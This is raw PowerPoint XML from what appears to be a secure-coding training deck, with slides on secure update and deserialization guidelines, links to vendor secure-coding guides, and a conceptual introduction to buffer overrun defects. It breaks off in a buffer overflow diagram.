          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What kinds of PII do your own applications handle?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For your own software projects, which of the Top 10 Privacy Risks represents the greatest challenge for software development?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335385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05426C-D9F0-4DC6-A55A-FA0667D02B60}"/>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3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6581C6AD-AA95-4DA9-9923-910498F7A9D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure updates are performed safely. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use cryptographic signatures for your code and verify them in your download client. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encrypted channels to transfer code to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure both client and server software, but emphasize server security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research and use the configuration options and user interface features of your development tool kit, which may alert you to possible security problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use components that are outdated or have known vulnerabilities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run services and applications with the least permissions possible to contain the damage of compromise or remote execution attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A01480B-C33B-42F3-A485-7AA1FEEAD991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines for Secure Coding—2 (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69306985-1753-44D8-83AA-18164A86D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81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05426C-D9F0-4DC6-A55A-FA0667D02B60}"/>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3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6581C6AD-AA95-4DA9-9923-910498F7A9D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not accept serialized objects from untrusted sources; only allow authenticated users and processes to have access to your app.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt the serialization process to prevent hostile object creation and data tampering from running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor the serialization process to catch malicious code or breach attempts; keep a log of serialization activity for later analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate user input; beware of malicious cookies and password hashes cached from previous sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a web application firewall to detect malicious or unauthorized insecure deserialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure application domain objects cannot be deserialized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use non-standard data formats to make your code a more difficult target for attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only deserialize signed data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A01480B-C33B-42F3-A485-7AA1FEEAD991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guidelines for Secure Coding—3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69306985-1753-44D8-83AA-18164A86D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8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14</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Every environment has its own set of special challenges and constraints for secure programming.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider pulling together a checklist of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common problems you should avoid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Best practices you should follow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this activity, you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform a web search to identify sources of best practices for secure coding in the environments you use for development:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The compilers or interpreters you use to develop code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The runtime environments you develop applications for (such as Java VM, .NET, Windows UWP, and so forth).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The operating system your applications run on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Services your applications use (such as Amazon Web Services,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure, Google Cloud Platform, and so forth).</a:t>
            </a:r>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Activity: Researching Your Secure Coding Checklist</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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5121808"/>
            <a:ext cx="1725124" cy="1630038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3116503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B36A41-28F2-4505-A2E8-AFCD95E72EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A562714C-A403-4508-9EC4-E00F89F5E956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following are some example websites that provide such information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to Secure Coding Guide (Apple iOS and Mac OS)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Introduction.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to secure Windows app development</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/windows/uwp/security/intro-to-secure-windows-app-development</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security for Android Developers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.android.com/topic/security/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure programming in C/C++ using Visual Studio</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://resources.infosecinstitute.com/sdl-for-cc-code-in-visual-studio-2013-overview/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure programming using C compilers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/C-Based_Toolchain_Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure programming using CLang 5, the compiler used by Apple</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://clang.llvm.org/docs/UsersManual.html#command-line-options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426E359D-438E-4599-9ACB-D84C07F47470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Coding Guides—Websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CD453C-ECCE-46BF-A85A-D0DD402660C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5121808"/>
            <a:ext cx="1725124" cy="1630038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216989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Buffer Overrun Defects (Slide 1 of 2)</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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cause of many cyber security problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Morris worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first major cyber attack on the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disabled large portions of the Internet for several days in 1988</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Heartbleed Bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put more than half of all web servers at risk in 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put encrypted data and credentials at risk of exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common payload of the buffer overrun is remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable an attacker to access a data buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reading or writing data that exceeds the boundaries allocated to that buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be used to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crash the software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read (possibly sensitive) data outside the bounds of the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write data outside of the buffer, enabling attacker to inject malicious code or data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185389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Buffer Overrun Defects (Slide 2 of 2)</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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply to a wide variety of data types, such as pointers, arrays, and so forth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of buffer overruns include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overreads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uncontrolled format strings</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229745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Bent 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D86027-C911-42C6-A4ED-978725224F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2421489" y="2909039"/>
            <a:ext cx="985335" cy="1264543"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19016"/>
              <a:gd name="adj2" fmla="val 19738"/>
              <a:gd name="adj3" fmla="val 24202"/>
              <a:gd name="adj4" fmla="val 35566"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75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Buffer Overflows (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDDA9E8C-5F0C-4D6C-BB9E-ED243489B658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501825" y="2438400"/>
            <a:ext cx="2133600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>usernameBadCode()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281FE8D0-6307-4FB4-934C-7CC58638F4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349425" y="2362200"/>
            <a:ext cx="2438400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF39F452-1D63-411F-B48D-D7AE71FD7D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54024" y="2440601"/>
            <a:ext cx="1285189" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Name:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F0B6774-1454-45EC-9F9C-909EDB385D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3535270" y="3800820"/>
            <a:ext cx="5180532" cy="369357"/>
            <a:chOff x="1943633" y="2227598"/>
            <a:chExt cx="5180532" cy="369357"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9E22F4-9E7F-461E-B9B4-BD5CB993726B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1943633" y="2227623"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>u</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264B0F00-99DF-441D-9284-3E115406378E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2248433" y="2227623"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>s</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05CC425E-B303-4F87-91BC-FD3B597B8290}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2553233" y="2227623"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F887FBB0-039E-4DF2-9C7C-CDDDB432BB32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
